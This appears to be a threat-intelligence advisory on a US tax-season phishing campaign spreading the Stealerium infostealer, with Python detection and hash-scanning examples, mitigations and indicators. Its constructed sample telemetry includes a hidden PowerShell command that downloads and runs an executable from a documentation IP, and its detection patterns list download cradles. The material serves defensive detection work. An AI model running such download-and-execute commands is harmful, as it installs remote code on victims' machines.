
Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer

Medium
Published: Wed Apr 30 2025 (04/30/2025, 17:22:40 UTC)
Source: AlienVault OTX General

Description

Cybercriminals are exploiting the US tax season to deploy Stealerium malware, targeting citizens through sophisticated phishing campaigns. The attack utilizes deceptive email attachments with malicious LNK files, leading to the execution of PowerShell scripts and the download of a PyInstaller-packaged executable. This payload injects into mstsc.exe and deploys Stealerium, an information-stealing malware that exfiltrates sensitive data from browsers, cryptocurrency wallets, and popular applications. The malware employs anti-analysis techniques, creates a hidden directory, and registers with a command and control server. It steals credentials from various sources, including browsers, gaming platforms, and messaging apps, while also capturing webcam images and Wi-Fi passwords.

AI-Powered Analysis

Last updated: 07/02/2025, 00:25:37 UTC

Technical Analysis

The Stealerium campaign exploits the US tax season to target individuals, primarily in the United States, through phishing emails. The lure email carries a malicious LNK (Windows shortcut) file as an attachment. When the victim opens the shortcut, its target runs a PowerShell command that downloads a PyInstaller-packaged executable. That executable injects its payload into mstsc.exe, the Remote Desktop Connection client, a signed Microsoft binary, so that the stealer's activity appears to come from a trusted process.

The injected payload, Stealerium, is an information stealer that collects credentials saved in web browsers, cryptocurrency wallet data, gaming-platform and messaging-application logins, saved Wi-Fi profiles and passwords, and webcam captures. It uses anti-analysis checks to hinder sandboxing and forensic examination, stores its components in a hidden directory, and registers with a command-and-control (C2) server, to which it exfiltrates the stolen data.

The tax-season theme is pure social engineering: no software vulnerability is exploited, so no software version is "affected" and there is no patch to apply. The chain depends entirely on the victim opening the attachment, which is where prevention should focus. The published indicators of compromise are file hashes for the campaign's components (listed below). Because droppers are trivially repacked, hash matches should be treated as confirmation rather than as the primary detection; behavioural signals (explorer.exe spawning PowerShell that downloads a file, an unsigned binary in a user-writable directory launching or injecting into mstsc.exe) give coverage against repacked variants. The combination of process injection and anti-analysis techniques lengthens dwell time if the initial execution is missed.
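The behavioural signals above can be expressed as a small set of rules over endpoint process telemetry. The following is an added example written for this page, not tooling from the Seqrite report or the AlienVault pulse. It uses Sysmon field names (Event ID 1 ProcessCreate, Event ID 8 CreateRemoteThread); the sample events, the paths, the user name and the 198.51.100.7 address are all constructed for illustration, and the assumption that explorer.exe is the only normal parent of mstsc.exe is a starting allowlist that should be tuned per environment.

```python
"""Detection heuristics for the LNK -> PowerShell -> dropper -> mstsc.exe
injection chain described above.  Added example; the events below are
constructed, Sysmon-shaped records, not telemetry from a real infection."""
import re

# Constructed sample telemetry, shaped like Sysmon events rendered to dicts.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    # Stage 1: the LNK target runs PowerShell hidden and downloads the next stage.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest '
                    r'http://198.51.100.7/tax.exe -OutFile $env:TEMP\tax.exe; '
                    r'Start-Process $env:TEMP\tax.exe"'},
    # Stage 2: PyInstaller-packaged dropper running from the user's temp folder.
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\tax.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\tax.exe"},
    # Stage 3: mstsc.exe started by the dropper rather than by the user, then injected into.
    {"EventID": 1, "Image": r"C:\Windows\System32\mstsc.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\tax.exe", "CommandLine": "mstsc.exe"},
    {"EventID": 8, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\tax.exe",
     "TargetImage": r"C:\Windows\System32\mstsc.exe"},
    # Benign: the user launches Remote Desktop from the Start menu.
    {"EventID": 1, "Image": r"C:\Windows\System32\mstsc.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "mstsc.exe /v:fileserver"},
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
EXPLORER = re.compile(r"\\explorer\.exe$", re.I)
MSTSC = re.compile(r"\\mstsc\.exe$", re.I)
# Directories a standard user can write to; a dropper almost always runs from one.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)
# Common PowerShell download cradles and encoded-command switches (-e / -enc / -encodedcommand).
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer"
    r"|\bcurl\b|\bwget\b|\s-e(nc(odedcommand)?)?\s|frombase64string", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def base(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, offending_image) pairs for every event that trips a rule."""
    findings = []
    for e in events:
        if e["EventID"] == 1:
            img, parent, cmd = e["Image"], e["ParentImage"], e.get("CommandLine", "")
            # Shortcut double-clicked in Explorer running a PowerShell downloader.
            if (POWERSHELL.search(img) and EXPLORER.search(parent)
                    and (DOWNLOAD_CRADLE.search(cmd) or HIDDEN_WINDOW.search(cmd))):
                findings.append(("lnk_powershell_download", base(img)))
            # PowerShell launching a binary from a user-writable directory.
            if USER_WRITABLE.search(img) and POWERSHELL.search(parent):
                findings.append(("powershell_spawned_temp_binary", base(img)))
            # mstsc.exe started by something other than the shell (assumed allowlist).
            if MSTSC.search(img) and not EXPLORER.search(parent):
                findings.append(("mstsc_unusual_parent", base(parent)))
        elif e["EventID"] == 8 and MSTSC.search(e["TargetImage"]):
            # A remote thread created inside mstsc.exe is the injection itself.
            findings.append(("remote_thread_into_mstsc", base(e["SourceImage"])))
    return findings


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:32s} {image}")
```

The four rules fire in chain order on the constructed events and stay silent on the benign mstsc.exe launch. In production the parent allowlist for mstsc.exe needs to include whatever legitimately launches it in your estate (jump-host scripts, RemoteApp launchers), and the Event ID 8 rule is the one to alert on with highest confidence, since there is no ordinary reason for a user-directory executable to create a thread in the RDP client.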

Potential Impact

For European organizations the direct exposure is currently limited, since the lures are built around the US tax season. The tooling is not US-specific, however, and the same chain can be re-themed for national tax deadlines or other financial events in Europe with no technical change. Stealerium's credential theft, webcam capture and data exfiltration could then lead to identity theft, financial fraud, corporate espionage and privacy violations. The organizational risk is not that mstsc.exe is used for remote desktop (the malware merely hides inside that process); it is that credentials harvested from an infected endpoint, including saved RDP, VPN and web-application logins, give the attacker a path into corporate networks and a starting point for lateral movement. Process injection and anti-analysis techniques complicate detection and lengthen dwell time. The primary impact is on confidentiality; integrity and availability are at risk only indirectly, through follow-on abuse of the stolen credentials.

Mitigation Recommendations

1. Deploy email filtering that detects and quarantines phishing messages carrying suspicious attachments, in particular LNK shortcut files and archives containing them. Shortcut files are almost never a legitimate attachment type and can be blocked outright for most users.
2. Enforce attachment handling policies that block or sandbox executable content and shortcut files at the mail gateway, so that a single click cannot start the chain.
3. Use Endpoint Detection and Response (EDR) tooling that detects process injection, mstsc.exe started by an unusual parent or behaving abnormally (for example, network connections to hosts that are not RDP servers), and suspicious PowerShell invocations (hidden windows, execution-policy bypass, download cradles).
4. Apply application control (for example AppLocker or WDAC) so that unsigned or unknown binaries, including PyInstaller-packaged executables dropped into user-writable directories, cannot run.
5. Conduct targeted user awareness training on phishing risks, timed to tax seasons and other financial events, emphasising the danger of opening unexpected attachments.
6. Monitor network traffic for unusual command-and-control (C2) communications and data exfiltration patterns, particularly from endpoints where mstsc.exe is the process making the connection.
7. Audit and restrict Remote Desktop Protocol (RDP) usage and credentials and enforce multi-factor authentication (MFA), since credentials stolen from an infected endpoint are the attacker's route to lateral movement.
8. Enforce least privilege on endpoints. Standard user accounts limit what a stealer can reach and tamper with, though note that creating a hidden directory and injecting into a process owned by the same user need no elevation, so this is a damage limiter rather than a preventive control.
9. Integrate threat intelligence feeds and the indicators of compromise below (file hashes) into monitoring and detection tools. Hash indicators are brittle because droppers are repacked per campaign, so pair them with the behavioural detections above.
10. Conduct regular security assessments and phishing simulation exercises to improve resilience against similar campaigns.
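Recommendation 9 is straightforward to operationalise for file hashes. The script below is an added example, not tooling from the report: it takes the six hashes from the Indicators of Compromise section as-is, infers the algorithm of each from its digest length, hashes every file under a directory in one pass and reports matches. The files it scans are constructed in a temporary directory so the script runs offline; the SHA-256 of one constructed file is added to the IOC set purely to demonstrate a hit.

```python
"""Match files on disk against the hash IOCs listed in this report.
Added example; the IOC values are the report's, the scanned files are constructed."""
import hashlib
import os
import tempfile

# Hashes from the report's IOC list: one 32-hex MD5 and five 64-hex SHA-256 values.
REPORT_IOCS = {
    "e9d3e2dd2788c322ffd2c9defddf7728",
    "10f217c72f62aed40957c438b865f0bcebc7e42a5e947051edee1649adf0cbf2",
    "31705d906058e7324027e65ce7f4f7a30bcf6c30571aa3f020e91678a22a835a",
    "48328ce3a4b2c2413acb87a4d1f8c3b7238db826f313a25173ad5ad34632d9d7",
    "6a9889fee93128a9cdcb93d35a2fec9c6127905d14c0ceed14f5f1c4f58542b8",
    "ff5e3e3bf67d292c73491fab0d94533a712c2935bb4a9135546ca4a416ba8ca1",
}

ALGO_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256"}


def normalize_iocs(iocs):
    """Group IOC hashes by algorithm, inferred from hex length; reject malformed values."""
    grouped = {}
    for h in iocs:
        h = h.strip().lower()
        algo = ALGO_BY_LENGTH.get(len(h))
        if algo is None or any(c not in "0123456789abcdef" for c in h):
            raise ValueError(f"not a recognised hex digest: {h!r}")
        grouped.setdefault(algo, set()).add(h)
    return grouped


def digests(path, algos, chunk=1 << 20):
    """Compute every required digest of one file in a single read pass."""
    hashers = {a: hashlib.new(a) for a in algos}
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            for h in hashers.values():
                h.update(block)
    return {a: h.hexdigest() for a, h in hashers.items()}


def scan(root, iocs):
    """Walk `root` and return (path, algorithm, digest) for every file matching an IOC."""
    grouped = normalize_iocs(iocs)
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            for algo, value in digests(path, grouped).items():
                if value in grouped[algo]:
                    hits.append((path, algo, value))
    return hits


def demo():
    """Constructed demo: a benign file plus one whose SHA-256 is added to the IOC set."""
    with tempfile.TemporaryDirectory() as root:
        constructed_payload = b"constructed sample payload, not real malware"
        with open(os.path.join(root, "tax_form.exe"), "wb") as f:
            f.write(constructed_payload)
        with open(os.path.join(root, "notes.txt"), "wb") as f:
            f.write(b"nothing to see here")
        iocs = REPORT_IOCS | {hashlib.sha256(constructed_payload).hexdigest()}
        return [(os.path.basename(p), algo) for p, algo, _ in scan(root, iocs)]


if __name__ == "__main__":
    for name, algo in demo():
        print(f"IOC match: {name} ({algo})")
```

Point `scan()` at a user's profile or a mail quarantine directory with `REPORT_IOCS` to hunt for the published samples. Only the algorithms actually present in the IOC set are computed, so adding SHA-1 indicators later costs nothing until one is supplied; malformed indicator values raise immediately rather than silently never matching.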


Technical Details

Author
AlienVault
TLP
white
References
["https://www.seqrite.com/blog/threat-actors-are-targeting-us-tax-session-with-new-tactics-of-stealerium-infostealer/"]
Adversary
null
Pulse Id
68125c60e131717220211bb5
Threat Score
null

Indicators of Compromise

Hash

Type (inferred from digest length)   Value
MD5       e9d3e2dd2788c322ffd2c9defddf7728
SHA-256   10f217c72f62aed40957c438b865f0bcebc7e42a5e947051edee1649adf0cbf2
SHA-256   31705d906058e7324027e65ce7f4f7a30bcf6c30571aa3f020e91678a22a835a
SHA-256   48328ce3a4b2c2413acb87a4d1f8c3b7238db826f313a25173ad5ad34632d9d7
SHA-256   6a9889fee93128a9cdcb93d35a2fec9c6127905d14c0ceed14f5f1c4f58542b8
SHA-256   ff5e3e3bf67d292c73491fab0d94533a712c2935bb4a9135546ca4a416ba8ca1

Threat ID: 6839e730182aa0cae2b929df

Added to database: 5/30/2025, 5:13:20 PM

Last enriched: 7/2/2025, 12:25:37 AM

Last updated: 7/26/2025, 3:11:51 PM
